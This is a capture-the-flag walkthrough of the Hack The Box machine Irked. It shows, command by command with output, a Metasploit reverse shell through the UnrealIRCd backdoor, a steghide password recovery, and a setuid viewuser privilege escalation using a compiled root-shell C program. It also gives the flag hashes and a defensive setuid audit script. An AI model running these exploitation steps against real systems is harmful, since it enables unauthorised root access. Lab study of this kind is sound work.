__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hola@lacashita.com

 
 

[HTB] Irked

Today we are going to hack the HTB machine called Irked. It is rated as easy.
  • Enumeration
  • To start, we run an nmap scan to see which ports are open.
    sml@m0nikE:~/ctf/htb/machines/irked$ nmap -A -p- 10.10.10.117
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-02 16:31 CET
    Nmap scan report for 10.10.10.117
    Host is up (0.050s latency).
    Not shown: 65528 closed ports
    PORT      STATE SERVICE VERSION
    22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
    | ssh-hostkey:
    |   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
    |   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
    |   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
    |_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
    80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
    |_http-server-header: Apache/2.4.10 (Debian)
    |_http-title: Site doesn't have a title (text/html).
    111/tcp   open  rpcbind 2-4 (RPC #100000)
    | rpcinfo:
    |   program version   port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100024  1          44359/tcp6  status
    |   100024  1          47760/udp   status
    |   100024  1          49705/tcp   status
    |_  100024  1          50353/udp6  status
    6697/tcp  open  irc     UnrealIRCd
    8067/tcp  open  irc     UnrealIRCd
    49705/tcp open  status  1 (RPC #100024)
    65534/tcp open  irc     UnrealIRCd
    Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 1378.78 seconds
    Several ports are open, and after checking them it looks like there is an exploit for UnrealIRCd.
  • Exploitation
  • We set up Metasploit to use the UnrealIRCd vulnerability.
    msf5 > search unreal

    Matching Modules
    ================

       #  Name                                        Disclosure Date  Rank       Check  Description
       -  ----                                        ---------------  ----       -----  -----------
       0  exploit/linux/games/ut2004_secure           2004-06-18       good       Yes    Unreal Tournament 2004 "secure" Overflow (Linux)
       1  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution
       2  exploit/windows/games/ut2004_secure         2004-06-18       good       Yes    Unreal Tournament 2004 "secure" Overflow (Win32)

    msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
    msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

    Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
       RPORT   6667             yes       The target port (TCP)

    Exploit target:

       Id  Name
       --  ----
       0   Automatic Target

    msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
    rhosts => 10.10.10.117
    msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
    rport => 6697
    msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

    [*] Started reverse TCP double handler on 10.10.14.6:4444
    [*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
        :irked.htb NOTICE AUTH :*** Looking up your hostname...
    [*] 10.10.10.117:6697 - Sending backdoor command...
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command: echo c7xNhr3Z1pldPJIL;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets...
    [*] Reading from socket A
    [*] A: "c7xNhr3Z1pldPJIL\r\n"
    [*] Matching...
    [*] B is input...
    [*] Command shell session 1 opened (10.10.14.6:4444 -> 10.10.10.117:43230) at 2019-11-02 16:43:51 +0100

    python -c 'import pty; pty.spawn("/bin/sh")'
    $ cat /etc/passwd
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
    systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
    systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
    systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
    messagebus:x:104:111::/var/run/dbus:/bin/false
    avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
    Debian-exim:x:106:114::/var/spool/exim4:/bin/false
    statd:x:107:65534::/var/lib/nfs:/bin/false
    colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
    dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
    geoclue:x:110:119::/var/lib/geoclue:/bin/false
    pulse:x:111:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
    speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
    sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
    rtkit:x:114:123:RealtimeKit,,,:/proc:/bin/false
    saned:x:115:124::/var/lib/saned:/bin/false
    usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
    hplip:x:117:7:HPLIP system user,,,:/var/run/hplip:/bin/false
    Debian-gdm:x:118:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
    djmardov:x:1000:1000:djmardov,,,:/home/djmardov:/bin/bash
    ircd:x:1001:1001::/home/ircd:/bin/sh
    There is a user called djmardov, so let's see which files belong to that user.
    $ find / -user djmardov 2>/dev/null
    find / -user djmardov 2>/dev/null
    /home/djmardov
    /home/djmardov/.dbus
    /home/djmardov/.profile
    /home/djmardov/.ssh
    /home/djmardov/Downloads
    /home/djmardov/Documents
    /home/djmardov/Documents/user.txt
    /home/djmardov/Documents/.backup
    /home/djmardov/.gnupg
    /home/djmardov/Desktop
    /home/djmardov/.cache
    /home/djmardov/.gconf
    /home/djmardov/.local
    /home/djmardov/.ICEauthority
    /home/djmardov/Music
    /home/djmardov/Public
    /home/djmardov/.config
    /home/djmardov/.bash_logout
    /home/djmardov/.bashrc
    /home/djmardov/Videos
    /home/djmardov/Pictures
    /home/djmardov/Templates
    /home/djmardov/.mozilla
    The file /home/djmardov/Documents/.backup stands out, so let's see what it contains.
    $ file /home/djmardov/Documents/.backup
    /home/djmardov/Documents/.backup: ASCII text
    $ cat /home/djmardov/Documents/.backup
    Super elite steg backup pw
    UPupDOWNdownLRlrBAbaSSss
    It looks like the file contains a password... and it says "steg", so we can assume there is some file with something "hidden" inside it. After looking around, we download the image shown on the website to our machine:
    wget http://10.10.10.117/irked.jpg
    Let's see whether steghide and the password from .backup turn up anything in the image we downloaded...
    sml@m0nikE:~/ctf/htb/machines/irked$ steghide extract -sf irked.jpg
    Anotar salvoconducto:
    anoté los datos extraídos e/"pass.txt".
    sml@m0nikE:~/ctf/htb/machines/irked$ cat pass.txt
    Kab6h+m+bbp2J:HG
    That looks like djmardov's password, so we try to connect over ssh with those credentials.
    sml@m0nikE:~/ctf/htb/machines/irked$ ssh djmardov@10.10.10.117
  • user.txt
  • The credentials worked, so we read the user flag.
    djmardov@irked:~$ ls
    Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
    djmardov@irked:~$ cd Documents/
    djmardov@irked:~/Documents$ ls
    user.txt
    djmardov@irked:~/Documents$ cat user.txt
    4a66a78b12dc0e661a59d3f5c0267a8e
    djmardov@irked:~/Documents$
  • Privilege Escalation
  • We download the linuxprivchecker.py script onto the machine and run it to see whether it turns up any useful information...
    Looking through the SUID/SGID files reported by the script, there is an unusual one: /usr/bin/viewuser, a root-owned setuid binary. When we run it, it reports that it cannot find "/tmp/listusers":
    djmardov@irked:~$ /usr/bin/viewuser
    This application is being devleoped to set and test user permissions
    It is still being actively developed
    (unknown) :0           2020-01-06 11:03 (:0)
    djmardov  pts/0        2020-01-06 11:09 (10.10.14.14)
    sh: 1: /tmp/listusers: not found
    We create the file "/tmp/listusers" and run it again to see what happens...
    djmardov@irked:~$ touch /tmp/listusers
    djmardov@irked:~$ /usr/bin/viewuser
    This application is being devleoped to set and test user permissions
    It is still being actively developed
    (unknown) :0           2020-01-06 11:03 (:0)
    djmardov  pts/0        2020-01-06 11:09 (10.10.14.14)
    sh: 1: /tmp/listusers: Permission denied
    Now it says permission denied... Let's put the command "id" inside the file and make it executable...
    djmardov@irked:~$ echo id > /tmp/listusers
    djmardov@irked:~$ chmod +x /tmp/listusers
    djmardov@irked:~$ /usr/bin/viewuser
    This application is being devleoped to set and test user permissions
    It is still being actively developed
    (unknown) :0           2020-01-06 11:03 (:0)
    djmardov  pts/0        2020-01-06 11:09 (10.10.14.14)
    uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
    It executed the script... and with root's uid. Knowing this, we prepare a shell that gives us root privileges. Copy the following code into a file called /tmp/listusers.c
    #include <stdio.h>
    #include <stdlib.h>      /* system() */
    #include <sys/types.h>
    #include <unistd.h>

    int main(void)
    {
        /* viewuser runs us with effective uid 0, so make real uid/gid root too */
        setuid(0);
        setgid(0);
        /* spawn an interactive root shell */
        system("/bin/bash");
        return 0;
    }
    Now we compile it and run viewuser again...
    djmardov@irked:~$ gcc -o /tmp/listusers /tmp/listusers.c
    djmardov@irked:~$ chmod +x /tmp/listusers
    djmardov@irked:~$ /usr/bin/viewuser
    This application is being devleoped to set and test user permissions
    It is still being actively developed
    (unknown) :0           2020-01-19 15:43 (:0)
    djmardov  pts/0        2020-01-19 15:46 (10.10.14.25)
    root@irked:~# id
    uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth),1000(djmardov)
    We are root :)
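    The weakness behind this escalation is a setuid binary that executes a path inside a directory any local user can write to. The following POSIX sh audit is an added example (not part of the original write-up or of the Irked machine): it lists setuid/setgid files under a directory and reports any embedded path under /tmp, /var/tmp or /dev/shm, which on Irked would flag /usr/bin/viewuser's reference to /tmp/listusers. The prefix list and the constructed sample files in the demo are assumptions.

```shell
#!/bin/sh
# Added audit example (not from the original write-up): report setuid/setgid
# binaries that embed a path under a user-writable directory, the pattern that
# makes /usr/bin/viewuser on Irked exploitable (it runs /tmp/listusers as root).

# Assumption: directories any local user can write into.
WRITABLE_PREFIXES='/tmp/ /var/tmp/ /dev/shm/'

# Print every embedded path under a writable prefix found in FILE, one per line.
# Non-printable bytes are turned into newlines first, so this works on an ELF
# binary without needing the `strings` tool.
find_risky_paths() {
    file="$1"
    for prefix in $WRITABLE_PREFIXES; do
        tr -c '[:print:]' '\n' < "$file" | grep -o "${prefix}[A-Za-z0-9_./-]*"
    done | sort -u
}

# Walk ROOT for setuid/setgid regular files and print each finding as
# "<binary> -> <embedded path>". Prints nothing when nothing is found.
audit_suid_tree() {
    root="$1"
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r bin; do
        find_risky_paths "$bin" | while IFS= read -r p; do
            printf '%s -> %s\n' "$bin" "$p"
        done
    done
}

# Constructed demo: two fake setuid "binaries" in a scratch directory, one of
# which references /tmp/listusers just as viewuser does. Only the first one
# should be reported.
demo_constructed_sample() {
    tmp=$(mktemp -d)
    printf 'being developed\001/tmp/listusers\001' > "$tmp/viewuser"
    printf 'harmless helper\001/usr/bin/id\001' > "$tmp/clean"
    chmod 4755 "$tmp/viewuser" "$tmp/clean"
    audit_suid_tree "$tmp"
    rm -rf "$tmp"
}

demo_constructed_sample
```

    To audit a real host, call audit_suid_tree / (or /usr) as a user who can read the binaries; a hit is worth reviewing even when the referenced file does not yet exist, since that is exactly the state viewuser was found in.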
  • root.txt
  • root@irked:/root# cat root.txt
    8d8e9e8be64654b6dccc3bff4522daf3
  • End
  • And with that we have both the "user" flag and the "root" flag.